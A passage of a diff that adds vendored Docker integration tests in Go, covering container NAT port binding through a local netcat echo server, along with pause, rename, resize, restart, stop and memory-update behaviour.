--- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/nat_test.go @@ -0,0 +1,120 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "bytes" + "context" + "fmt" + "io" + "io/ioutil" + "net" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "github.com/docker/go-connections/nat" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestNetworkNat(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + + defer setupTest(t)() + + msg := "it works" + startServerContainer(t, msg, 8080) + + endpoint := getExternalAddress(t) + conn, err := net.Dial("tcp", fmt.Sprintf("%s:%d", endpoint.String(), 8080)) + assert.NilError(t, err) + defer conn.Close() + + data, err := ioutil.ReadAll(conn) + assert.NilError(t, err) + assert.Check(t, is.Equal(msg, strings.TrimSpace(string(data)))) +} + +func TestNetworkLocalhostTCPNat(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + + defer setupTest(t)() + + msg := "hi yall" + startServerContainer(t, msg, 8081) + + conn, err := net.Dial("tcp", "localhost:8081") + assert.NilError(t, err) + defer conn.Close() + + data, err := ioutil.ReadAll(conn) + assert.NilError(t, err) + assert.Check(t, is.Equal(msg, strings.TrimSpace(string(data)))) +} + +func TestNetworkLoopbackNat(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + + defer setupTest(t)() + + msg := "it works" + serverContainerID := startServerContainer(t, msg, 8080) + + endpoint := getExternalAddress(t) + + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client, container.WithCmd("sh", "-c", fmt.Sprintf("stty raw && nc -w 5 %s 8080", endpoint.String())), container.WithTty(true), container.WithNetworkMode("container:"+serverContainerID)) + + poll.WaitOn(t, container.IsStopped(ctx, client, cID), poll.WithDelay(100*time.Millisecond)) + + body, err := client.ContainerLogs(ctx, cID, types.ContainerLogsOptions{ + ShowStdout: true, + }) + assert.NilError(t, err) + defer body.Close() + + var b bytes.Buffer + _, err = io.Copy(&b, body) + assert.NilError(t, err) + + assert.Check(t, is.Equal(msg, strings.TrimSpace(b.String()))) +} + +func startServerContainer(t *testing.T, msg string, port int) string { + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client, container.WithName("server-"+t.Name()), container.WithCmd("sh", "-c", fmt.Sprintf("echo %q | nc -lp %d", msg, port)), container.WithExposedPorts(fmt.Sprintf("%d/tcp", port)), func(c *container.TestContainerConfig) { + c.HostConfig.PortBindings = nat.PortMap{ + nat.Port(fmt.Sprintf("%d/tcp", port)): []nat.PortBinding{ + { + HostPort: fmt.Sprintf("%d", port), + }, + }, + } + }) + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + return cID +} + +func getExternalAddress(t *testing.T) net.IP { + iface, err := net.InterfaceByName("eth0") + skip.If(t, err != nil, "Test not running with `make test-integration`. Interface eth0 not found: %s", err) + + ifaceAddrs, err := iface.Addrs() + assert.NilError(t, err) + assert.Check(t, 0 != len(ifaceAddrs)) + + ifaceIP, _, err := net.ParseCIDR(ifaceAddrs[0].String()) + assert.NilError(t, err) + + return ifaceIP +} diff --git a/vendor/github.com/docker/docker/integration/container/pause_test.go b/vendor/github.com/docker/docker/integration/container/pause_test.go new file mode 100644 index 0000000000..8dd2d784b7 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/pause_test.go @@ -0,0 +1,98 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "io" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestPause(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType == "windows" && testEnv.DaemonInfo.Isolation == "process") + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client) + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + since := request.DaemonUnixTime(ctx, t, client, testEnv) + + err := client.ContainerPause(ctx, cID) + assert.NilError(t, err) + + inspect, err := client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, is.Equal(true, inspect.State.Paused)) + + err = client.ContainerUnpause(ctx, cID) + assert.NilError(t, err) + + until := request.DaemonUnixTime(ctx, t, client, testEnv) + + messages, errs := client.Events(ctx, types.EventsOptions{ + Since: since, + Until: until, + Filters: filters.NewArgs(filters.Arg("container", cID)), + }) + assert.Check(t, is.DeepEqual([]string{"pause", "unpause"}, getEventActions(t, messages, errs))) +} + +func TestPauseFailsOnWindowsServerContainers(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "windows" || testEnv.DaemonInfo.Isolation != "process") + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client) + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + err := client.ContainerPause(ctx, cID) + assert.Check(t, is.ErrorContains(err, "cannot pause Windows Server Containers")) +} + +func TestPauseStopPausedContainer(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.31"), "broken in earlier versions") + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client) + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + err := client.ContainerPause(ctx, cID) + assert.NilError(t, err) + + err = client.ContainerStop(ctx, cID, nil) + assert.NilError(t, err) + + poll.WaitOn(t, container.IsStopped(ctx, client, cID), poll.WithDelay(100*time.Millisecond)) +} + +func getEventActions(t *testing.T, messages <-chan events.Message, errs <-chan error) []string { + var actions []string + for { + select { + case err := <-errs: + assert.Check(t, err == nil || err == io.EOF) + return actions + case e := <-messages: + actions = append(actions, e.Status) + } + } +} diff --git a/vendor/github.com/docker/docker/integration/container/ps_test.go b/vendor/github.com/docker/docker/integration/container/ps_test.go new file mode 100644 index 0000000000..4ae07043ab --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/ps_test.go @@ -0,0 +1,49 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestPsFilter(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + prev := container.Create(t, ctx, client) + top := container.Create(t, ctx, client) + next := container.Create(t, ctx, client) + + containerIDs := func(containers []types.Container) []string { + var entries []string + for _, container := range containers { + entries = append(entries, container.ID) + } + return entries + } + + f1 := filters.NewArgs() + f1.Add("since", top) + q1, err := client.ContainerList(ctx, types.ContainerListOptions{ + All: true, + Filters: f1, + }) + assert.NilError(t, err) + assert.Check(t, is.Contains(containerIDs(q1), next)) + + f2 := filters.NewArgs() + f2.Add("before", top) + q2, err := client.ContainerList(ctx, types.ContainerListOptions{ + All: true, + Filters: f2, + }) + assert.NilError(t, err) + assert.Check(t, is.Contains(containerIDs(q2), prev)) +} diff --git a/vendor/github.com/docker/docker/integration/container/remove_test.go b/vendor/github.com/docker/docker/integration/container/remove_test.go new file mode 100644 index 0000000000..5de13f22ad --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/remove_test.go @@ -0,0 +1,112 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "os" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/fs" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func getPrefixAndSlashFromDaemonPlatform() (prefix, slash string) { + if testEnv.OSType == "windows" { + return "c:", `\` + } + return "", "/" +} + +// Test case for #5244: `docker rm` fails if bind dir doesn't exist anymore +func TestRemoveContainerWithRemovedVolume(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + + tempDir := fs.NewDir(t, "test-rm-container-with-removed-volume", fs.WithMode(0755)) + defer tempDir.Remove() + + cID := container.Run(t, ctx, client, container.WithCmd("true"), container.WithBind(tempDir.Path(), prefix+slash+"test")) + poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond)) + + err := os.RemoveAll(tempDir.Path()) + assert.NilError(t, err) + + err = client.ContainerRemove(ctx, cID, types.ContainerRemoveOptions{ + RemoveVolumes: true, + }) + assert.NilError(t, err) + + _, _, err = client.ContainerInspectWithRaw(ctx, cID, true) + assert.Check(t, is.ErrorContains(err, "No such container")) +} + +// Test case for #2099/#2125 +func TestRemoveContainerWithVolume(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + + cID := container.Run(t, ctx, client, container.WithCmd("true"), container.WithVolume(prefix+slash+"srv")) + poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond)) + + insp, _, err := client.ContainerInspectWithRaw(ctx, cID, true) + assert.NilError(t, err) + assert.Check(t, is.Equal(1, len(insp.Mounts))) + volName := insp.Mounts[0].Name + + err = client.ContainerRemove(ctx, cID, types.ContainerRemoveOptions{ + RemoveVolumes: true, + }) + assert.NilError(t, err) + + volumes, err := client.VolumeList(ctx, filters.NewArgs(filters.Arg("name", volName))) + assert.NilError(t, err) + assert.Check(t, is.Equal(0, len(volumes.Volumes))) +} + +func TestRemoveContainerRunning(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + cID := container.Run(t, ctx, client) + + err := client.ContainerRemove(ctx, cID, types.ContainerRemoveOptions{}) + assert.Check(t, is.ErrorContains(err, "cannot remove a running container")) +} + +func TestRemoveContainerForceRemoveRunning(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + cID := container.Run(t, ctx, client) + + err := client.ContainerRemove(ctx, cID, types.ContainerRemoveOptions{ + Force: true, + }) + assert.NilError(t, err) +} + +func TestRemoveInvalidContainer(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + err := client.ContainerRemove(ctx, "unknown", types.ContainerRemoveOptions{}) + assert.Check(t, is.ErrorContains(err, "No such container")) +} diff --git a/vendor/github.com/docker/docker/integration/container/rename_test.go b/vendor/github.com/docker/docker/integration/container/rename_test.go new file mode 100644 index 0000000000..c3f46e10c2 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/rename_test.go @@ -0,0 +1,213 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "testing" + "time" + + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/network" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/pkg/stringid" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +// This test simulates the scenario mentioned in #31392: +// Having two linked container, renaming the target and bringing a replacement +// and then deleting and recreating the source container linked to the new target. +// This checks that "rename" updates source container correctly and doesn't set it to null. +func TestRenameLinkedContainer(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.32"), "broken in earlier versions") + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + aName := "a0" + t.Name() + bName := "b0" + t.Name() + aID := container.Run(t, ctx, client, container.WithName(aName)) + bID := container.Run(t, ctx, client, container.WithName(bName), container.WithLinks(aName)) + + err := client.ContainerRename(ctx, aID, "a1"+t.Name()) + assert.NilError(t, err) + + container.Run(t, ctx, client, container.WithName(aName)) + + err = client.ContainerRemove(ctx, bID, types.ContainerRemoveOptions{Force: true}) + assert.NilError(t, err) + + bID = container.Run(t, ctx, client, container.WithName(bName), container.WithLinks(aName)) + + inspect, err := client.ContainerInspect(ctx, bID) + assert.NilError(t, err) + assert.Check(t, is.DeepEqual([]string{"/" + aName + ":/" + bName + "/" + aName}, inspect.HostConfig.Links)) +} + +func TestRenameStoppedContainer(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + oldName := "first_name" + t.Name() + cID := container.Run(t, ctx, client, container.WithName(oldName), container.WithCmd("sh")) + poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond)) + + inspect, err := client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, is.Equal("/"+oldName, inspect.Name)) + + newName := "new_name" + stringid.GenerateNonCryptoID() + err = client.ContainerRename(ctx, oldName, newName) + assert.NilError(t, err) + + inspect, err = client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, is.Equal("/"+newName, inspect.Name)) +} + +func TestRenameRunningContainerAndReuse(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + oldName := "first_name" + t.Name() + cID := container.Run(t, ctx, client, container.WithName(oldName)) + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + newName := "new_name" + stringid.GenerateNonCryptoID() + err := client.ContainerRename(ctx, oldName, newName) + assert.NilError(t, err) + + inspect, err := client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, is.Equal("/"+newName, inspect.Name)) + + _, err = client.ContainerInspect(ctx, oldName) + assert.Check(t, is.ErrorContains(err, "No such container: "+oldName)) + + cID = container.Run(t, ctx, client, container.WithName(oldName)) + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + inspect, err = client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, is.Equal("/"+oldName, inspect.Name)) +} + +func TestRenameInvalidName(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + oldName := "first_name" + t.Name() + cID := container.Run(t, ctx, client, container.WithName(oldName)) + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + err := client.ContainerRename(ctx, oldName, "new:invalid") + assert.Check(t, is.ErrorContains(err, "Invalid container name")) + + inspect, err := client.ContainerInspect(ctx, oldName) + assert.NilError(t, err) + assert.Check(t, is.Equal(cID, inspect.ID)) +} + +// Test case for GitHub issue 22466 +// Docker's service discovery works for named containers so +// ping to a named container should work, and an anonymous +// container without a name does not work with service discovery. +// However, an anonymous could be renamed to a named container. +// This test is to make sure once the container has been renamed, +// the service discovery for the (re)named container works. +func TestRenameAnonymousContainer(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + networkName := "network1" + t.Name() + _, err := client.NetworkCreate(ctx, networkName, types.NetworkCreate{}) + + assert.NilError(t, err) + cID := container.Run(t, ctx, client, func(c *container.TestContainerConfig) { + c.NetworkingConfig.EndpointsConfig = map[string]*network.EndpointSettings{ + networkName: {}, + } + c.HostConfig.NetworkMode = containertypes.NetworkMode(networkName) + }) + + container1Name := "container1" + t.Name() + err = client.ContainerRename(ctx, cID, container1Name) + assert.NilError(t, err) + // Stop/Start the container to get registered + // FIXME(vdemeester) this is a really weird behavior as it fails otherwise + err = client.ContainerStop(ctx, container1Name, nil) + assert.NilError(t, err) + err = client.ContainerStart(ctx, container1Name, types.ContainerStartOptions{}) + assert.NilError(t, err) + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + count := "-c" + if testEnv.OSType == "windows" { + count = "-n" + } + cID = container.Run(t, ctx, client, func(c *container.TestContainerConfig) { + c.NetworkingConfig.EndpointsConfig = map[string]*network.EndpointSettings{ + networkName: {}, + } + c.HostConfig.NetworkMode = containertypes.NetworkMode(networkName) + }, container.WithCmd("ping", count, "1", container1Name)) + poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond)) + + inspect, err := client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, is.Equal(0, inspect.State.ExitCode), "container %s exited with the wrong exitcode: %+v", cID, inspect) +} + +// TODO: should be a unit test +func TestRenameContainerWithSameName(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + oldName := "old" + t.Name() + cID := container.Run(t, ctx, client, container.WithName(oldName)) + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + err := client.ContainerRename(ctx, oldName, oldName) + assert.Check(t, is.ErrorContains(err, "Renaming a container with the same name")) + err = client.ContainerRename(ctx, cID, oldName) + assert.Check(t, is.ErrorContains(err, "Renaming a container with the same name")) +} + +// Test case for GitHub issue 23973 +// When a container is being renamed, the container might +// be linked to another container. In that case, the meta data +// of the linked container should be updated so that the other +// container could still reference to the container that is renamed. +func TestRenameContainerWithLinkedContainer(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + db1Name := "db1" + t.Name() + db1ID := container.Run(t, ctx, client, container.WithName(db1Name)) + poll.WaitOn(t, container.IsInState(ctx, client, db1ID, "running"), poll.WithDelay(100*time.Millisecond)) + + app1Name := "app1" + t.Name() + app2Name := "app2" + t.Name() + app1ID := container.Run(t, ctx, client, container.WithName(app1Name), container.WithLinks(db1Name+":/mysql")) + poll.WaitOn(t, container.IsInState(ctx, client, app1ID, "running"), poll.WithDelay(100*time.Millisecond)) + + err := client.ContainerRename(ctx, app1Name, app2Name) + assert.NilError(t, err) + + inspect, err := client.ContainerInspect(ctx, app2Name+"/mysql") + assert.NilError(t, err) + assert.Check(t, is.Equal(db1ID, inspect.ID)) +} diff --git a/vendor/github.com/docker/docker/integration/container/resize_test.go b/vendor/github.com/docker/docker/integration/container/resize_test.go new file mode 100644 index 0000000000..5961af0a47 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/resize_test.go @@ -0,0 +1,66 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "net/http" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + req "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestResize(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client) + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + err := client.ContainerResize(ctx, cID, types.ResizeOptions{ + Height: 40, + Width: 40, + }) + assert.NilError(t, err) +} + +func TestResizeWithInvalidSize(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.32"), "broken in earlier versions") + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client) + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + endpoint := "/containers/" + cID + "/resize?h=foo&w=bar" + res, _, err := req.Post(endpoint) + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(http.StatusBadRequest, res.StatusCode)) +} + +func TestResizeWhenContainerNotStarted(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client, container.WithCmd("echo")) + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond)) + + err := client.ContainerResize(ctx, cID, types.ResizeOptions{ + Height: 40, + Width: 40, + }) + assert.Check(t, is.ErrorContains(err, "is not running")) +} diff --git a/vendor/github.com/docker/docker/integration/container/restart_test.go b/vendor/github.com/docker/docker/integration/container/restart_test.go new file mode 100644 index 0000000000..69007218f1 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/restart_test.go @@ -0,0 +1,114 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "fmt" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/internal/test/daemon" + "gotest.tools/assert" + "gotest.tools/skip" +) + +func TestDaemonRestartKillContainers(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon, "cannot start daemon on remote test run") + type testCase struct { + desc string + config *container.Config + hostConfig *container.HostConfig + + xRunning bool + xRunningLiveRestore bool + xStart bool + } + + for _, c := range []testCase{ + { + desc: "container without restart policy", + config: &container.Config{Image: "busybox", Cmd: []string{"top"}}, + xRunningLiveRestore: true, + xStart: true, + }, + { + desc: "container with restart=always", + config: &container.Config{Image: "busybox", Cmd: []string{"top"}}, + hostConfig: &container.HostConfig{RestartPolicy: container.RestartPolicy{Name: "always"}}, + xRunning: true, + xRunningLiveRestore: true, + xStart: true, + }, + { + desc: "container created should not be restarted", + config: &container.Config{Image: "busybox", Cmd: []string{"top"}}, + hostConfig: &container.HostConfig{RestartPolicy: container.RestartPolicy{Name: "always"}}, + }, + } { + for _, liveRestoreEnabled := range []bool{false, true} { + for fnName, stopDaemon := range map[string]func(*testing.T, *daemon.Daemon){ + "kill-daemon": func(t *testing.T, d *daemon.Daemon) { + err := d.Kill() + assert.NilError(t, err) + }, + "stop-daemon": func(t *testing.T, d *daemon.Daemon) { + d.Stop(t) + }, + } { + t.Run(fmt.Sprintf("live-restore=%v/%s/%s", liveRestoreEnabled, c.desc, fnName), func(t *testing.T) { + c := c + liveRestoreEnabled := liveRestoreEnabled + stopDaemon := stopDaemon + + t.Parallel() + + d := daemon.New(t) + client, err := d.NewClient() + assert.NilError(t, err) + + args := []string{"--iptables=false"} + if liveRestoreEnabled { + args = append(args, "--live-restore") + } + + d.StartWithBusybox(t, args...) + defer d.Stop(t) + ctx := context.Background() + + resp, err := client.ContainerCreate(ctx, c.config, c.hostConfig, nil, "") + assert.NilError(t, err) + defer client.ContainerRemove(ctx, resp.ID, types.ContainerRemoveOptions{Force: true}) + + if c.xStart { + err = client.ContainerStart(ctx, resp.ID, types.ContainerStartOptions{}) + assert.NilError(t, err) + } + + stopDaemon(t, d) + d.Start(t, args...) + + expected := c.xRunning + if liveRestoreEnabled { + expected = c.xRunningLiveRestore + } + + var running bool + for i := 0; i < 30; i++ { + inspect, err := client.ContainerInspect(ctx, resp.ID) + assert.NilError(t, err) + + running = inspect.State.Running + if running == expected { + break + } + time.Sleep(2 * time.Second) + + } + assert.Equal(t, expected, running, "got unexpected running state, expected %v, got: %v", expected, running) + // TODO(cpuguy83): test pause states... this seems to be rather undefined currently + }) + } + } + } +} diff --git a/vendor/github.com/docker/docker/integration/container/stats_test.go b/vendor/github.com/docker/docker/integration/container/stats_test.go new file mode 100644 index 0000000000..6493a30573 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/stats_test.go @@ -0,0 +1,43 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "encoding/json" + "io" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestStats(t *testing.T) { + skip.If(t, !testEnv.DaemonInfo.MemoryLimit) + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + info, err := client.Info(ctx) + assert.NilError(t, err) + + cID := container.Run(t, ctx, client) + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + resp, err := client.ContainerStats(ctx, cID, false) + assert.NilError(t, err) + defer resp.Body.Close() + + var v *types.Stats + err = json.NewDecoder(resp.Body).Decode(&v) + assert.NilError(t, err) + assert.Check(t, is.Equal(int64(v.MemoryStats.Limit), info.MemTotal)) + err = json.NewDecoder(resp.Body).Decode(&v) + assert.Assert(t, is.ErrorContains(err, ""), io.EOF) +} diff --git a/vendor/github.com/docker/docker/integration/container/stop_test.go b/vendor/github.com/docker/docker/integration/container/stop_test.go new file mode 100644 index 0000000000..7a2fa20188 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/stop_test.go @@ -0,0 +1,127 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "fmt" + "strconv" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + "gotest.tools/icmd" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestStopContainerWithRestartPolicyAlways(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + names := []string{"verifyRestart1-" + t.Name(), "verifyRestart2-" + t.Name()} + for _, name := range names { + container.Run(t, ctx, client, container.WithName(name), container.WithCmd("false"), func(c *container.TestContainerConfig) { + c.HostConfig.RestartPolicy.Name = "always" + }) + } + + for _, name := range names { + poll.WaitOn(t, container.IsInState(ctx, client, name, "running", "restarting"), poll.WithDelay(100*time.Millisecond)) + } + + for _, name := range names { + err := client.ContainerStop(ctx, name, nil) + assert.NilError(t, err) + } + + for _, name := range names { + poll.WaitOn(t, container.IsStopped(ctx, client, name), poll.WithDelay(100*time.Millisecond)) + } +} + +// TestStopContainerWithTimeout checks that ContainerStop with +// a timeout works as documented, i.e. in case of negative timeout +// waiting is not limited (issue #35311). +func TestStopContainerWithTimeout(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + testCmd := container.WithCmd("sh", "-c", "sleep 2 && exit 42") + testData := []struct { + doc string + timeout int + expectedExitCode int + }{ + // In case container is forcefully killed, 137 is returned, + // otherwise the exit code from the above script + { + "zero timeout: expect forceful container kill", + 0, 137, + }, + { + "too small timeout: expect forceful container kill", + 1, 137, + }, + { + "big enough timeout: expect graceful container stop", + 3, 42, + }, + { + "unlimited timeout: expect graceful container stop", + -1, 42, + }, + } + + for _, d := range testData { + d := d + t.Run(strconv.Itoa(d.timeout), func(t *testing.T) { + t.Parallel() + id := container.Run(t, ctx, client, testCmd) + + timeout := time.Duration(d.timeout) * time.Second + err := client.ContainerStop(ctx, id, &timeout) + assert.NilError(t, err) + + poll.WaitOn(t, container.IsStopped(ctx, client, id), + poll.WithDelay(100*time.Millisecond)) + + inspect, err := client.ContainerInspect(ctx, id) + assert.NilError(t, err) + assert.Equal(t, inspect.State.ExitCode, d.expectedExitCode) + }) + } +} + +func TestDeleteDevicemapper(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.Driver != "devicemapper") + skip.If(t, testEnv.IsRemoteDaemon, "cannot start daemon on remote test run") + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + id := container.Run(t, ctx, client, container.WithName("foo-"+t.Name()), container.WithCmd("echo")) + + poll.WaitOn(t, container.IsStopped(ctx, client, id), poll.WithDelay(100*time.Millisecond)) + + inspect, err := client.ContainerInspect(ctx, id) + assert.NilError(t, err) + + deviceID := inspect.GraphDriver.Data["DeviceId"] + + // Find pool name from device name + deviceName := inspect.GraphDriver.Data["DeviceName"] + devicePrefix := deviceName[:strings.LastIndex(deviceName, "-")] + devicePool := fmt.Sprintf("/dev/mapper/%s-pool", devicePrefix) + + result := icmd.RunCommand("dmsetup", "message", devicePool, "0", fmt.Sprintf("delete %s", deviceID)) + result.Assert(t, icmd.Success) + + err = client.ContainerRemove(ctx, id, types.ContainerRemoveOptions{}) + assert.NilError(t, err) +} diff --git a/vendor/github.com/docker/docker/integration/container/update_linux_test.go b/vendor/github.com/docker/docker/integration/container/update_linux_test.go new file mode 100644 index 0000000000..0e410a1461 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/update_linux_test.go @@ -0,0 +1,107 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "strconv" + "strings" + "testing" + "time" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestUpdateMemory(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + skip.If(t, !testEnv.DaemonInfo.MemoryLimit) + skip.If(t, !testEnv.DaemonInfo.SwapLimit) + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client, func(c *container.TestContainerConfig) { + c.HostConfig.Resources = containertypes.Resources{ + Memory: 200 * 1024 * 1024, + } + }) + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + const ( + setMemory int64 = 314572800 + setMemorySwap int64 = 524288000 + ) + + _, err := client.ContainerUpdate(ctx, cID, containertypes.UpdateConfig{ + Resources: containertypes.Resources{ + Memory: setMemory, + MemorySwap: setMemorySwap, + }, + }) + 